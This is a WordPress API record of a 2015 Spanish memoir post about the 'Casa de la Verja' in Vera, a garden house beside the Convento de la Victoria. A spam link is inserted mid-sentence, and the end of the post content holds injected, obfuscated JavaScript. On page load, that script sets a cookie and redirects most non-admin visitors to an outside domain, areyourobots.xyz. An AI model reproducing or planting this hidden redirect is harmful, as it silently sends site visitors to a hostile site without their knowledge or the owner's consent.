{"id":1641,"date":"2015-11-18T13:42:44","date_gmt":"2015-11-18T13:42:44","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=1641"},"modified":"2018-01-15T13:18:01","modified_gmt":"2018-01-15T13:18:01","slug":"la-casa-de-la-verja","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2015\/11\/18\/la-casa-de-la-verja\/","title":{"rendered":"LA CASA DE LA VERJA"},"content":{"rendered":"<p align=\"justify\">Vaya por delante mi sincero agradecimiento a D. Sebasti\u00e1n Bur\u00f3n Cervantes por facilitarme fotograf\u00edas e informaci\u00f3n en relaci\u00f3n al art\u00edculo que, a continuaci\u00f3n, se expone:<\/p>\n<p align=\"justify\"><!--more--><\/p>\n<p align=\"justify\">Ten\u00eda cinco a\u00f1os y mis padres se hab\u00edan trasladado a vivir a una de las trece casas ubicadas en el llamado Reducto, que, otrora, era un solar de unos, aproximadamente, cuatro mil metros cuadrados formado por dos o tres viejas casas desperdigadas, <a href=\"https:\/\/life-hack.com.ua\/\">lifehack<\/a> entre ellas la de mi abuela Rosal\u00eda. En el centro de este solar, una fuente con un ca\u00f1o por el que manaba agua, lugar este, recuerdo, donde los peque\u00f1os, adem\u00e1s de beber y jugar, mat\u00e1bamos avispas y pon\u00edamos cepos para cazar p\u00e1jaros.<\/p>\n<p align=\"justify\">Pronto el barrio se convirti\u00f3 en zona habitada con calles asfaltadas y espacios abiertos para jardineras que nunca tuvieron ese uso. Las trece casas, pintadas de color rojo, conformaban los cincuenta y dos pisos de la barriada. Me estoy refiriendo, por supuesto, a las llamadas \u201cCasas Nuevas\u201d.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-1.jpeg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-1646\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-1-300x198.jpeg\" alt=\"Verja 1\" width=\"300\" height=\"198\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-1-300x198.jpeg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-1.jpeg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\">Pues bien, entonces, desde mi dormitorio situado en la parte superior de la casa de mis padres, la panor\u00e1mica que perfectamente ahora visualizo era espectacular por su belleza y colorido. En mi mente, la Casa de la Verja. La recuerdo as\u00ed:<\/p>\n<p align=\"justify\">Bajo mi mirada, la confluencia de dos importantes calles de Vera: del Mar y del Aire (hoy, Juan Anglada). La primera estaba asfaltada por servir de carretera que cruzaba el pueblo y nos conduc\u00eda a Garrucha. La segunda era de tierra apisonada y nos acercaba al centro de la ciudad: Plaza Mayor, Iglesia y Ayuntamiento. El asfalto de las calles en los pueblos \u2013 principio de los a\u00f1os cincuenta- era de muy dif\u00edcil logro.<\/p>\n<p align=\"justify\">A mi izquierda, el Convento de la Victoria,-s. XVII-, cubierta su fachada norte hasta la c\u00faspide de su torre de hiedra de verdes hojas pecioladas donde anidaban centenares de p\u00e1jaros, entre los que destacaban vencejos y gorriones. Este convento, tambi\u00e9n llamado de los Padres M\u00ednimos \u2013Orden fundada por San Francisco de Paula en el s. XV, distingui\u00e9ndose sus integrantes por la humildad- fue lugar de amparo de im\u00e1genes de santos que desfilaban en procesi\u00f3n en Semana Santa.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Convento-4.jpeg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-1644\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Convento-4-198x300.jpeg\" alt=\"Convento 4\" width=\"198\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Convento-4-198x300.jpeg 198w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Convento-4.jpeg 506w\" sizes=\"(max-width: 198px) 100vw, 198px\" \/><\/a><\/p>\n<p align=\"justify\">Enfrente, una casa encalada de amplias habitaciones y dos alturas con techumbre a dos aguas. La fachada este de la casa \u2013unos cuarenta metros de larga- estaba aireada por ventanales con balcones de hierro pintados en negro como si de puertas con cancelas se tratara. Delante de la casa, un jard\u00edn rectangular de unos mil metros cuadrados cercado por una valla de obra y sobre ella una empalizada o verja de madera de color gris y de forma romboidal acabada en su extremo en punta de flecha. Se acced\u00eda, siempre que el perro pastor alem\u00e1n lo permitiese, al caser\u00f3n a trav\u00e9s de dos puertas de madera que hac\u00edan juego con la verja y, por la norte, siempre cerrada, por una situada en la calle del Mar. A la izquierda, lindando con el convento, una caballeriza. El resto del espacio, ese inmenso jard\u00edn formado por una gigantesca buganvilla, adelfas, rosales, una platanera, dos palmeras, naranjos, mandarineros y otros \u00e1rboles frutales, as\u00ed como un cenador o p\u00e9rgola en forma circular cercado de plantas. Asimismo, pose\u00eda, adem\u00e1s, una balsa cuadrada que se abastec\u00eda del agua proveniente de la fuente de la Plaza Mayor para regar la plantaci\u00f3n.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-3.jpeg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-1643\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-3-200x300.jpeg\" alt=\"Verja 3\" width=\"200\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-3-200x300.jpeg 200w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-3.jpeg 512w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/><\/a><\/p>\n<p align=\"justify\">Tambi\u00e9n, c\u00f3mo no, esta casa tuvo su particular historia. Adem\u00e1s de acoger a miembros de la Orden de los Padres M\u00ednimos, durante nuestra contienda civil fue utilizada como Hospital de Sangre y atenci\u00f3n a heridos, y, finalizada \u00e9sta, sirvi\u00f3 como alojamiento a soldados del Batall\u00f3n de C\u00e1diz.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2.jpeg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1647\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2-300x133.jpeg\" alt=\"Verja 2\" width=\"300\" height=\"133\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2-300x133.jpeg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2.jpeg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\">Ahora, sesenta a\u00f1os despu\u00e9s, mi madre, con noventa de edad y muy desmemoriada, ante mi insistencia por refrescar su memoria para sonsacarle cosas sobre la Casa de la Verja, con toda naturalidad, al contestarme fue rotunda en su aseveraci\u00f3n: \u00bfno voy a recordar la casa de mi madre Rosal\u00eda, d\u00f3nde nac\u00ed y cri\u00e9, o la de la verja, enfrente de la m\u00eda? \u00a1C\u00f3mo est\u00e1s, hijo m\u00edo!<\/p>\n<p align=\"justify\">Cr\u00e9anme, amigos lectores, realmente no me lo esperaba. Por unos momentos, mi madre se traslad\u00f3, con lucidez, al pasado, siendo, en parte, fuente de inspiraci\u00f3n en la reconstrucci\u00f3n de vivencias pret\u00e9ritas que, por emotivas, han permanecido y permanecen, imborrables, en mi mente durante toda una vida.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2.jpeg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1647\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2-300x133.jpeg\" alt=\"Verja 2\" width=\"300\" height=\"133\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2-300x133.jpeg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/Verja-2.jpeg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: right\" align=\"justify\">Autor: Diego Morales Carmona<\/p>\n<p style=\"text-align: right\" align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/diego-morales.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1642\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/11\/diego-morales.jpg\" alt=\"diego morales\" width=\"179\" height=\"109\" \/><\/a><\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vaya por delante mi sincero agradecimiento a D. Sebasti\u00e1n Bur\u00f3n Cervantes por facilitarme fotograf\u00edas e informaci\u00f3n en relaci\u00f3n al art\u00edculo que, a continuaci\u00f3n, se expone:<\/p>\n","protected":false},"author":7,"featured_media":1646,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[82,108,267],"class_list":["post-1641","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones","tag-diego-morales-carmona","tag-la-verja","tag-s-xx"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=1641"}],"version-history":[{"count":2,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1641\/revisions"}],"predecessor-version":[{"id":3200,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1641\/revisions\/3200"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/1646"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=1641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=1641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=1641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}